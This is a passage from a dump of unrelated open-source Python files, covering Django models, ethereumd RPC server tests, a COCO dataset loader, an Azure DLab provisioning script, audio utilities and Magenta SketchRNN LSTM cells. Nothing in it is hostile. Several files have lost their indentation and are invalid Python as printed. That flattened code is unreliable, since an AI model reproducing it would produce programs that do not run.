user = models.OneToOneField(User, on_delete=models.CASCADE)
    approved_courses = models.ManyToManyField('api.ResultContest',
            related_name='user_approved_courses', blank=True)
tests_performed = models.ManyToManyField('api.ResultTest',
related_name='user_result_test', blank=True)
class Meta:
verbose_name = 'Usuario - Perfil'
verbose_name_plural = 'Usuarios - Perfiles'
def __str__(self):
return str(self.user)
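# Example (assumption -- not part of the original module; run in a configured
# Django shell):
#
#   user = User.objects.create_user(
#       username="jane", email="jane@example.com", password="s3cret")
#   profile = ProfileUser.objects.create(user=user)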
m-bo-one/ethereumd-proxy | tests/test_server.py | 1d1eb3905dac4b28a8e23c283214859a13f6e020 | from collections import namedtuple
import json
from asynctest.mock import patch
import pytest
from ethereumd.server import RPCServer
from ethereumd.proxy import EthereumProxy
from aioethereum.errors import BadResponseError
from .base import BaseTestRunner
Request = namedtuple('Request', ['json'])
class TestServer(BaseTestRunner):
run_with_node = True
async def init_server(self, loop):
server = RPCServer()
with patch('ethereumd.poller.Poller.poll'):
await server.before_server_start()(None, loop)
return server
@pytest.mark.asyncio
async def test_server_handler_index_success_call(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'params': [],
'id': 'test',
}
request = Request(json=data)
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error'] is None
assert isinstance(parsed['result'], int)
@pytest.mark.asyncio
async def test_server_handler_index_invalid_rpc_data(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'id': 'test',
}
request = Request(json=data)
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error']['code'] == -32602
assert parsed['error']['message'] == 'Invalid rpc 2.0 structure'
assert parsed['result'] is None
@pytest.mark.asyncio
async def test_server_handler_index_attr_error_call(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'params': [],
'id': 'test',
}
request = Request(json=data)
def _raise_error():
raise AttributeError('bla bla method not found')
with patch.object(EthereumProxy, 'getblockcount',
side_effect=_raise_error):
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error']['code'] == -32601
assert parsed['error']['message'] == 'Method not found'
assert parsed['result'] is None
@pytest.mark.asyncio
async def test_server_handler_index_type_error_call(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'params': [],
'id': 'test',
}
request = Request(json=data)
def _raise_error():
raise TypeError('test')
with patch.object(EthereumProxy, 'getblockcount',
side_effect=_raise_error):
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error']['code'] == -1
assert parsed['error']['message'] == 'test'
assert parsed['result'] is None
@pytest.mark.asyncio
async def test_server_handler_index_bad_response_call(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'params': [],
'id': 'test',
}
request = Request(json=data)
def _raise_error():
raise BadResponseError('test', code=-99999999)
with patch.object(EthereumProxy, 'getblockcount',
side_effect=_raise_error):
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error']['code'] == -99999999
assert parsed['error']['message'] == 'test'
assert parsed['result'] is None
evdcush/neorl | neorl/rl/baselines/readme.py | a1af069072e752ab79e7279a88ad95d195a81821 | # This file is part of NEORL.
# Copyright (c) 2021 Exelon Corporation and MIT Nuclear Science and Engineering
# NEORL is free software: you can redistribute it and/or modify
# it under the terms of the MIT LICENSE
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#The NEORL team thanks stable-baselines, as we have used their implementation of different RL
#algorithms to build NEORL's optimizers. We have used the files in this open-source repo:
#https://github.com/hill-a/stable-baselines
sushantPatrikar/WaveCompartor | Compare.py | 112395287b41c1b5533924ebe293c5641647a5e3 | from scipy.io import wavfile
import numpy as np
import pingouin as pg
_, data = wavfile.read('wav//ed//mp3baked.wav')
_, data1 = wavfile.read('wav//ing//ingeating.wav')
# promote mono (1-D) signals to 2-D (n_samples, n_channels) for uniform indexing
try:
    data.shape[1]
except IndexError:
    data = data.reshape(data.shape[0], 1)
try:
    data1.shape[1]
except IndexError:
    data1 = data1.reshape(data1.shape[0], 1)
# locate the last non-zero sample in channel 0, i.e. where the audio really ends
index_1 = np.nonzero(data[:, 0])[0][-1]
index_2 = np.nonzero(data1[:, 0])[0][-1]
# trim the trailing silence, then keep the final 2000 samples of each file
data = data[:index_1 + 1, :]
data1 = data1[:index_2 + 1, :]
data = data[-2000:, :]
data1 = data1[-2000:, :]
x = pg.corr(x=data[:, 0], y=data1[:, 0])
print(x)
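# Sanity check: the Pearson r reported by pingouin should match numpy's plain
# estimate (added illustration, not required for the comparison).
print('numpy r =', np.corrcoef(data[:, 0], data1[:, 0])[0, 1])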
sco1/pylox | tests/comments/test_only_block_comment.py | b4820828306c20cee3f8533c2547fafb92c6c1bd | from textwrap import dedent
import pytest
from pylox.lox import Lox
TEST_SRC = dedent(
"""\
/*
This is a multiline block comment
*/
"""
)
EXPECTED_STDOUTS: list[str] = []
def test_block_comment_at_eof(capsys: pytest.CaptureFixture) -> None:
interpreter = Lox()
interpreter.run(TEST_SRC)
assert not interpreter.had_error
assert not interpreter.had_runtime_error
all_out = capsys.readouterr().out.splitlines()
assert all_out == EXPECTED_STDOUTS
n-kats/mlbase | mlbase/lazy.py | 7d69f259dcaf9608a921523083458fa6d0d6914b | from mlbase.utils.misc import lazy
tensorflow = lazy("tensorflow")
numpy = lazy("numpy")
gensim = lazy("gensim")
sturmianseq/observed | setup.py | d99fb99ff2a470a86efb2763685e8e2c021e799f | import re
import setuptools
README_FILENAME = "README.md"
VERSION_FILENAME = "observed.py"
VERSION_RE = r"^__version__ = ['\"]([^'\"]*)['\"]"
# Get version information
with open(VERSION_FILENAME, "r") as version_file:
mo = re.search(VERSION_RE, version_file.read(), re.M)
if mo:
version = mo.group(1)
else:
msg = "Unable to find version string in %s." % (version_file,)
raise RuntimeError(msg)
# Get description information
with open(README_FILENAME, "r") as description_file:
long_description = description_file.read()
setuptools.setup(
name="observed",
version=version,
author="Daniel Sank",
author_email="[email protected]",
description="Observer pattern for functions and bound methods",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/DanielSank/observed",
py_modules=["observed"],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
catalyst-team/detector | src/coco.py | 383c17ba7701d960ca92be0aafbff05207f2de3a | import os
import json
import numpy as np
import pickle
from typing import Any
from pycocotools.coco import COCO
from torch.utils.data import Dataset
class DetectionMSCOCODataset(Dataset):
def __init__(self, annotation_file: str, image_dir: str):
self._annotation_file = annotation_file
self._image_dir = image_dir
self._cache_file = self._annotation_file + ".cache"
self._coco = COCO(self._annotation_file)
self._img_ids = self._coco.getImgIds()
self._cat_ids = self._coco.getCatIds()
self._ann_ids = self._coco.getAnnIds()
self._data = "coco"
self._classes = {
ind: cat_id for ind, cat_id in enumerate(self._cat_ids)
}
self._coco_to_class_map = {
value: key for key, value in self._classes.items()
}
self._load_data()
self._db_inds = np.arange(len(self._image_names))
self._load_coco_data()
def _load_data(self):
print("loading from cache file: {}".format(self._cache_file))
if not os.path.exists(self._cache_file):
print("No cache file found...")
self._extract_data()
with open(self._cache_file, "wb") as f:
pickle.dump([self._detections, self._image_names], f)
print("Cache file created")
else:
with open(self._cache_file, "rb") as f:
self._detections, self._image_names = pickle.load(f)
def _load_coco_data(self):
with open(self._annotation_file, "r") as f:
data = json.load(f)
coco_ids = self._coco.getImgIds()
eval_ids = {
self._coco.loadImgs(coco_id)[0]["file_name"]: coco_id
for coco_id in coco_ids
}
self._coco_categories = data["categories"]
self._coco_eval_ids = eval_ids
def class_name(self, cid):
cat_id = self._classes[cid]
cat = self._coco.loadCats([cat_id])[0]
return cat["name"]
def _extract_data(self):
self._image_names = [
self._coco.loadImgs(img_id)[0]["file_name"]
for img_id in self._img_ids
]
self._detections = {}
for ind, (coco_image_id, image_name) in enumerate(zip(self._img_ids, self._image_names)):
image = self._coco.loadImgs(coco_image_id)[0]
bboxes = []
categories = []
for cat_id in self._cat_ids:
annotation_ids = self._coco.getAnnIds(imgIds=image["id"], catIds=cat_id)
annotations = self._coco.loadAnns(annotation_ids)
category = self._coco_to_class_map[cat_id]
for annotation in annotations:
bbox = np.array(annotation["bbox"])
bbox[[2, 3]] += bbox[[0, 1]]
bboxes.append(bbox)
categories.append(category)
self._detections[image_name] = [{
'bbox': bbox.astype(np.float32),
'category_id': category,
'category_name': self.class_name(category)
} for bbox, category in zip(bboxes, categories)]
def __getitem__(self, ind: int) -> Any:
image_name = self._image_names[ind]
return {
'image_name': os.path.join(self._image_dir, image_name),
'detections': self._detections[image_name]
}
def __len__(self) -> int:
return len(self._img_ids)
def get_num_classes(self) -> int:
return len(self._cat_ids)
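if __name__ == "__main__":
    # Usage sketch; the paths below are placeholders, not taken from the repo.
    dataset = DetectionMSCOCODataset(
        annotation_file="annotations/instances_val2017.json",
        image_dir="val2017",
    )
    print(len(dataset), "images,", dataset.get_num_classes(), "classes")
    print(dataset[0]["image_name"], len(dataset[0]["detections"]), "boxes")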
tadvi/uva | UVa 10105 polynomial coefficients/sample/main.py | 0ac0cbdf593879b4fb02a3efc09adbb031cb47d5 | import sys
import operator
sys.stdin = open('input.txt')
fact = [1, 1]
for i in range(2, 15):
fact.append(fact[-1] * i)
while True:
try:
n, k = map(int, raw_input().split())
coef = map(int, raw_input().split())
except:
break
print fact[n] / reduce(operator.mul, [fact[c] for c in coef])
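# The printed value is the multinomial coefficient n! / (c1! * c2! * ... * ck!)
# (note: Python 2 source -- raw_input and the print statement). For example,
# n=3 with coefficients (1, 2) gives 3!/(1!*2!) = 3.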
wallaceleonel/Flash-Cards | pynotes/note/models.py | fd563455d437f77e42ddf96133214cf752b62bb6 | from django.contrib.auth.models import User
from django.db import models
from django.urls import reverse
# Create your models here.
class Post(models.Model):
title = models.CharField(max_length=255)
    slug = models.SlugField(max_length=255, unique=True)
    # e.g. meusite.com/blog/introducao-ao-django
author = models.ForeignKey(User, on_delete=models.CASCADE)
body = models.TextField()
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ("-created",)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse("note:detail", kwargs={"slug": self.slug})
DmytroLiaskovskyi/incubator-dlab | infrastructure-provisioning/src/general/scripts/azure/common_notebook_configure_dataengine.py | af995e98b3b3cf526fb9741a3e5117dd1e04f3aa | #!/usr/bin/python
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import logging
import json
import sys
from dlab.fab import *
from dlab.meta_lib import *
from dlab.actions_lib import *
import os
import uuid
if __name__ == "__main__":
local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['project_name'],
os.environ['request_id'])
local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.DEBUG,
filename=local_log_filepath)
try:
# generating variables dictionary
print('Generating infrastructure names and tags')
notebook_config = dict()
try:
notebook_config['exploratory_name'] = os.environ['exploratory_name'].replace('_', '-')
    except KeyError:
notebook_config['exploratory_name'] = ''
try:
notebook_config['computational_name'] = os.environ['computational_name'].replace('_', '-')
    except KeyError:
notebook_config['computational_name'] = ''
notebook_config['service_base_name'] = os.environ['conf_service_base_name']
notebook_config['resource_group_name'] = os.environ['azure_resource_group_name']
notebook_config['region'] = os.environ['azure_region']
notebook_config['user_name'] = os.environ['edge_user_name'].replace('_', '-')
notebook_config['project_name'] = os.environ['project_name'].replace('_', '-')
notebook_config['project_tag'] = os.environ['project_name'].replace('_', '-')
notebook_config['endpoint_tag'] = os.environ['endpoint_name'].replace('_', '-')
notebook_config['cluster_name'] = notebook_config['service_base_name'] + '-' + notebook_config['project_name'] + \
'-de-' + notebook_config['exploratory_name'] + '-' + \
notebook_config['computational_name']
notebook_config['master_node_name'] = notebook_config['cluster_name'] + '-m'
notebook_config['slave_node_name'] = notebook_config['cluster_name'] + '-s'
notebook_config['notebook_name'] = os.environ['notebook_instance_name']
notebook_config['key_path'] = os.environ['conf_key_dir'] + '/' + os.environ['conf_key_name'] + '.pem'
notebook_config['dlab_ssh_user'] = os.environ['conf_os_user']
notebook_config['instance_count'] = int(os.environ['dataengine_instance_count'])
try:
notebook_config['spark_master_ip'] = AzureMeta().get_private_ip_address(
notebook_config['resource_group_name'], notebook_config['master_node_name'])
notebook_config['notebook_ip'] = AzureMeta().get_private_ip_address(
notebook_config['resource_group_name'], notebook_config['notebook_name'])
except Exception as err:
print('Error: {0}'.format(err))
sys.exit(1)
notebook_config['spark_master_url'] = 'spark://{}:7077'.format(notebook_config['spark_master_ip'])
except Exception as err:
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed to generate infrastructure names", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]')
print('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]')
params = "--cluster_name {0} --spark_version {1} --hadoop_version {2} --os_user {3} --spark_master {4}" \
" --keyfile {5} --notebook_ip {6} --datalake_enabled {7} --spark_master_ip {8}".\
format(notebook_config['cluster_name'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], notebook_config['dlab_ssh_user'],
notebook_config['spark_master_url'], notebook_config['key_path'], notebook_config['notebook_ip'],
os.environ['azure_datalake_enable'], notebook_config['spark_master_ip'])
try:
local("~/scripts/{}_{}.py {}".format(os.environ['application'], 'install_dataengine_kernels', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed installing Dataengine kernels.", str(err))
sys.exit(1)
try:
logging.info('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]')
print('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]')
params = "--hostname {0} " \
"--keyfile {1} " \
"--os_user {2} " \
"--cluster_name {3} " \
.format(notebook_config['notebook_ip'],
notebook_config['key_path'],
notebook_config['dlab_ssh_user'],
notebook_config['cluster_name'])
try:
local("~/scripts/{0}.py {1}".format('common_configure_spark', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed to configure Spark.", str(err))
sys.exit(1)
try:
with open("/root/result.json", 'w') as result:
res = {"notebook_name": notebook_config['notebook_name'],
"Action": "Configure notebook server"}
print(json.dumps(res))
result.write(json.dumps(res))
except:
print("Failed writing results.")
sys.exit(0)
ruohoruotsi/pyACA | pyACA/ToolFreq2Bark.py | 339e9395b65a217aa5965638af941b32d5c95454 | # -*- coding: utf-8 -*-
"""
helper function: convert Hz to Bark scale
Args:
fInHz: The frequency to be converted, can be scalar or vector
cModel: The name of the model ('Schroeder' [default], 'Terhardt', 'Zwicker', 'Traunmuller')
Returns:
Bark values of the input dimension
"""
import numpy as np
import math
def ToolFreq2Bark(fInHz, cModel='Schroeder'):
def acaSchroeder_scalar(f):
return 7 * math.asinh(f/650)
def acaTerhardt_scalar(f):
return 13.3 * math.atan(0.75 * f/1000)
def acaZwicker_scalar(f):
return 13 * math.atan(0.76 * f/1000) + 3.5 * math.atan(f/7500)
def acaTraunmuller_scalar(f):
return 26.81/(1+1960./f) - 0.53
f = np.asarray(fInHz)
if f.ndim == 0:
if cModel == 'Terhardt':
return acaTerhardt_scalar(f)
elif cModel == 'Zwicker':
return acaZwicker_scalar(f)
elif cModel == 'Traunmuller':
return acaTraunmuller_scalar(f)
else:
return acaSchroeder_scalar(f)
fBark = np.zeros(f.shape)
if cModel == 'Terhardt':
for k,fi in enumerate(f):
fBark[k] = acaTerhardt_scalar(fi)
elif cModel == 'Zwicker':
for k,fi in enumerate(f):
fBark[k] = acaZwicker_scalar(fi)
elif cModel == 'Traunmuller':
for k,fi in enumerate(f):
fBark[k] = acaTraunmuller_scalar(fi)
else:
for k,fi in enumerate(f):
fBark[k] = acaSchroeder_scalar(fi)
    return fBark
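if __name__ == "__main__":
    # quick sanity check (illustrative, not part of the original module)
    print(ToolFreq2Bark(1000))  # ~8.5 Bark with the default Schroeder model
    print(ToolFreq2Bark(np.asarray([100.0, 1000.0, 10000.0]), 'Traunmuller'))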
laurens-in/magenta | magenta/models/sketch_rnn/rnn.py | be6ed8d5b1eb2986ca277aa9c574a7912dd5ed0f | # Copyright 2019 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""SketchRNN RNN definition."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow.compat.v1 as tf
from tensorflow.contrib import rnn as contrib_rnn
def orthogonal(shape):
"""Orthogonal initilaizer."""
flat_shape = (shape[0], np.prod(shape[1:]))
a = np.random.normal(0.0, 1.0, flat_shape)
u, _, v = np.linalg.svd(a, full_matrices=False)
q = u if u.shape == flat_shape else v
return q.reshape(shape)
def orthogonal_initializer(scale=1.0):
"""Orthogonal initializer."""
def _initializer(shape, dtype=tf.float32,
partition_info=None): # pylint: disable=unused-argument
return tf.constant(orthogonal(shape) * scale, dtype)
return _initializer
def lstm_ortho_initializer(scale=1.0):
"""LSTM orthogonal initializer."""
def _initializer(shape, dtype=tf.float32,
partition_info=None): # pylint: disable=unused-argument
size_x = shape[0]
size_h = shape[1] // 4 # assumes lstm.
t = np.zeros(shape)
t[:, :size_h] = orthogonal([size_x, size_h]) * scale
t[:, size_h:size_h * 2] = orthogonal([size_x, size_h]) * scale
t[:, size_h * 2:size_h * 3] = orthogonal([size_x, size_h]) * scale
t[:, size_h * 3:] = orthogonal([size_x, size_h]) * scale
return tf.constant(t, dtype)
return _initializer
class LSTMCell(contrib_rnn.RNNCell):
"""Vanilla LSTM cell.
Uses ortho initializer, and also recurrent dropout without memory loss
(https://arxiv.org/abs/1603.05118)
"""
def __init__(self,
num_units,
forget_bias=1.0,
use_recurrent_dropout=False,
dropout_keep_prob=0.9):
self.num_units = num_units
self.forget_bias = forget_bias
self.use_recurrent_dropout = use_recurrent_dropout
self.dropout_keep_prob = dropout_keep_prob
@property
def state_size(self):
return 2 * self.num_units
@property
def output_size(self):
return self.num_units
def get_output(self, state):
unused_c, h = tf.split(state, 2, 1)
return h
def __call__(self, x, state, scope=None):
with tf.variable_scope(scope or type(self).__name__):
c, h = tf.split(state, 2, 1)
x_size = x.get_shape().as_list()[1]
w_init = None # uniform
h_init = lstm_ortho_initializer(1.0)
# Keep W_xh and W_hh separate here as well to use different init methods.
w_xh = tf.get_variable(
'W_xh', [x_size, 4 * self.num_units], initializer=w_init)
w_hh = tf.get_variable(
'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init)
bias = tf.get_variable(
'bias', [4 * self.num_units],
initializer=tf.constant_initializer(0.0))
concat = tf.concat([x, h], 1)
w_full = tf.concat([w_xh, w_hh], 0)
hidden = tf.matmul(concat, w_full) + bias
i, j, f, o = tf.split(hidden, 4, 1)
if self.use_recurrent_dropout:
g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob)
else:
g = tf.tanh(j)
new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g
new_h = tf.tanh(new_c) * tf.sigmoid(o)
    return new_h, tf.concat([new_c, new_h], 1)  # state is packed into one tensor rather than a tuple
def layer_norm_all(h,
batch_size,
base,
num_units,
scope='layer_norm',
reuse=False,
gamma_start=1.0,
epsilon=1e-3,
use_bias=True):
"""Layer Norm (faster version, but not using defun)."""
  # Performs layer norm on multiple blocks at once (i.e. i, g, j, o for LSTM)
  # Reshape h to apply layer norm in parallel over the `base` axis
h_reshape = tf.reshape(h, [batch_size, base, num_units])
mean = tf.reduce_mean(h_reshape, [2], keep_dims=True)
var = tf.reduce_mean(tf.square(h_reshape - mean), [2], keep_dims=True)
epsilon = tf.constant(epsilon)
rstd = tf.rsqrt(var + epsilon)
h_reshape = (h_reshape - mean) * rstd
# reshape back to original
h = tf.reshape(h_reshape, [batch_size, base * num_units])
with tf.variable_scope(scope):
if reuse:
tf.get_variable_scope().reuse_variables()
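    # NOTE: ln_gamma/ln_beta are sized for base == 4 (the i, j, f, o gate
    # blocks), so this helper effectively assumes base == 4.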
gamma = tf.get_variable(
'ln_gamma', [4 * num_units],
initializer=tf.constant_initializer(gamma_start))
if use_bias:
beta = tf.get_variable(
'ln_beta', [4 * num_units], initializer=tf.constant_initializer(0.0))
if use_bias:
return gamma * h + beta
return gamma * h
def layer_norm(x,
num_units,
scope='layer_norm',
reuse=False,
gamma_start=1.0,
epsilon=1e-3,
use_bias=True):
"""Calculate layer norm."""
axes = [1]
mean = tf.reduce_mean(x, axes, keep_dims=True)
x_shifted = x - mean
var = tf.reduce_mean(tf.square(x_shifted), axes, keep_dims=True)
inv_std = tf.rsqrt(var + epsilon)
with tf.variable_scope(scope):
if reuse:
tf.get_variable_scope().reuse_variables()
gamma = tf.get_variable(
'ln_gamma', [num_units],
initializer=tf.constant_initializer(gamma_start))
if use_bias:
beta = tf.get_variable(
'ln_beta', [num_units], initializer=tf.constant_initializer(0.0))
output = gamma * (x_shifted) * inv_std
if use_bias:
output += beta
return output
def raw_layer_norm(x, epsilon=1e-3):
axes = [1]
mean = tf.reduce_mean(x, axes, keep_dims=True)
std = tf.sqrt(
tf.reduce_mean(tf.square(x - mean), axes, keep_dims=True) + epsilon)
output = (x - mean) / (std)
return output
def super_linear(x,
output_size,
scope=None,
reuse=False,
init_w='ortho',
weight_start=0.0,
use_bias=True,
bias_start=0.0,
input_size=None):
"""Performs linear operation. Uses ortho init defined earlier."""
shape = x.get_shape().as_list()
with tf.variable_scope(scope or 'linear'):
if reuse:
tf.get_variable_scope().reuse_variables()
w_init = None # uniform
if input_size is None:
x_size = shape[1]
else:
x_size = input_size
if init_w == 'zeros':
w_init = tf.constant_initializer(0.0)
elif init_w == 'constant':
w_init = tf.constant_initializer(weight_start)
elif init_w == 'gaussian':
w_init = tf.random_normal_initializer(stddev=weight_start)
elif init_w == 'ortho':
w_init = lstm_ortho_initializer(1.0)
w = tf.get_variable(
'super_linear_w', [x_size, output_size], tf.float32, initializer=w_init)
if use_bias:
b = tf.get_variable(
'super_linear_b', [output_size],
tf.float32,
initializer=tf.constant_initializer(bias_start))
return tf.matmul(x, w) + b
return tf.matmul(x, w)
class LayerNormLSTMCell(contrib_rnn.RNNCell):
"""Layer-Norm, with Ortho Init. and Recurrent Dropout without Memory Loss.
https://arxiv.org/abs/1607.06450 - Layer Norm
https://arxiv.org/abs/1603.05118 - Recurrent Dropout without Memory Loss
"""
def __init__(self,
num_units,
forget_bias=1.0,
use_recurrent_dropout=False,
dropout_keep_prob=0.90):
"""Initialize the Layer Norm LSTM cell.
Args:
num_units: int, The number of units in the LSTM cell.
forget_bias: float, The bias added to forget gates (default 1.0).
use_recurrent_dropout: Whether to use Recurrent Dropout (default False)
dropout_keep_prob: float, dropout keep probability (default 0.90)
"""
self.num_units = num_units
self.forget_bias = forget_bias
self.use_recurrent_dropout = use_recurrent_dropout
self.dropout_keep_prob = dropout_keep_prob
@property
def input_size(self):
return self.num_units
@property
def output_size(self):
return self.num_units
@property
def state_size(self):
return 2 * self.num_units
def get_output(self, state):
h, unused_c = tf.split(state, 2, 1)
return h
def __call__(self, x, state, timestep=0, scope=None):
with tf.variable_scope(scope or type(self).__name__):
h, c = tf.split(state, 2, 1)
h_size = self.num_units
x_size = x.get_shape().as_list()[1]
batch_size = x.get_shape().as_list()[0]
w_init = None # uniform
h_init = lstm_ortho_initializer(1.0)
w_xh = tf.get_variable(
'W_xh', [x_size, 4 * self.num_units], initializer=w_init)
w_hh = tf.get_variable(
'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init)
concat = tf.concat([x, h], 1) # concat for speed.
w_full = tf.concat([w_xh, w_hh], 0)
      concat = tf.matmul(concat, w_full)  # no bias term; layer norm below supplies scale and shift
# i = input_gate, j = new_input, f = forget_gate, o = output_gate
concat = layer_norm_all(concat, batch_size, 4, h_size, 'ln_all')
i, j, f, o = tf.split(concat, 4, 1)
if self.use_recurrent_dropout:
g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob)
else:
g = tf.tanh(j)
new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g
new_h = tf.tanh(layer_norm(new_c, h_size, 'ln_c')) * tf.sigmoid(o)
return new_h, tf.concat([new_h, new_c], 1)
class HyperLSTMCell(contrib_rnn.RNNCell):
"""HyperLSTM with Ortho Init, Layer Norm, Recurrent Dropout, no Memory Loss.
https://arxiv.org/abs/1609.09106
http://blog.otoro.net/2016/09/28/hyper-networks/
"""
def __init__(self,
num_units,
forget_bias=1.0,
use_recurrent_dropout=False,
dropout_keep_prob=0.90,
use_layer_norm=True,
hyper_num_units=256,
hyper_embedding_size=32,
hyper_use_recurrent_dropout=False):
"""Initialize the Layer Norm HyperLSTM cell.
Args:
num_units: int, The number of units in the LSTM cell.
forget_bias: float, The bias added to forget gates (default 1.0).
use_recurrent_dropout: Whether to use Recurrent Dropout (default False)
dropout_keep_prob: float, dropout keep probability (default 0.90)
use_layer_norm: boolean. (default True)
Controls whether we use LayerNorm layers in main LSTM & HyperLSTM cell.
hyper_num_units: int, number of units in HyperLSTM cell.
(default is 128, recommend experimenting with 256 for larger tasks)
hyper_embedding_size: int, size of signals emitted from HyperLSTM cell.
(default is 16, recommend trying larger values for large datasets)
hyper_use_recurrent_dropout: boolean. (default False)
Controls whether HyperLSTM cell also uses recurrent dropout.
Recommend turning this on only if hyper_num_units becomes large (>= 512)
"""
self.num_units = num_units
self.forget_bias = forget_bias
self.use_recurrent_dropout = use_recurrent_dropout
self.dropout_keep_prob = dropout_keep_prob
self.use_layer_norm = use_layer_norm
self.hyper_num_units = hyper_num_units
self.hyper_embedding_size = hyper_embedding_size
self.hyper_use_recurrent_dropout = hyper_use_recurrent_dropout
self.total_num_units = self.num_units + self.hyper_num_units
if self.use_layer_norm:
cell_fn = LayerNormLSTMCell
else:
cell_fn = LSTMCell
self.hyper_cell = cell_fn(
hyper_num_units,
use_recurrent_dropout=hyper_use_recurrent_dropout,
dropout_keep_prob=dropout_keep_prob)
@property
def input_size(self):
return self._input_size
@property
def output_size(self):
return self.num_units
@property
def state_size(self):
return 2 * self.total_num_units
def get_output(self, state):
total_h, unused_total_c = tf.split(state, 2, 1)
h = total_h[:, 0:self.num_units]
return h
def hyper_norm(self, layer, scope='hyper', use_bias=True):
num_units = self.num_units
embedding_size = self.hyper_embedding_size
# recurrent batch norm init trick (https://arxiv.org/abs/1603.09025).
    init_gamma = 0.10  # small gamma init, per Cooijmans et al.
with tf.variable_scope(scope):
zw = super_linear(
self.hyper_output,
embedding_size,
init_w='constant',
weight_start=0.00,
use_bias=True,
bias_start=1.0,
scope='zw')
alpha = super_linear(
zw,
num_units,
init_w='constant',
weight_start=init_gamma / embedding_size,
use_bias=False,
scope='alpha')
result = tf.multiply(alpha, layer)
if use_bias:
zb = super_linear(
self.hyper_output,
embedding_size,
init_w='gaussian',
weight_start=0.01,
use_bias=False,
bias_start=0.0,
scope='zb')
beta = super_linear(
zb,
num_units,
init_w='constant',
weight_start=0.00,
use_bias=False,
scope='beta')
result += beta
return result
def __call__(self, x, state, timestep=0, scope=None):
with tf.variable_scope(scope or type(self).__name__):
total_h, total_c = tf.split(state, 2, 1)
h = total_h[:, 0:self.num_units]
c = total_c[:, 0:self.num_units]
self.hyper_state = tf.concat(
[total_h[:, self.num_units:], total_c[:, self.num_units:]], 1)
batch_size = x.get_shape().as_list()[0]
x_size = x.get_shape().as_list()[1]
self._input_size = x_size
w_init = None # uniform
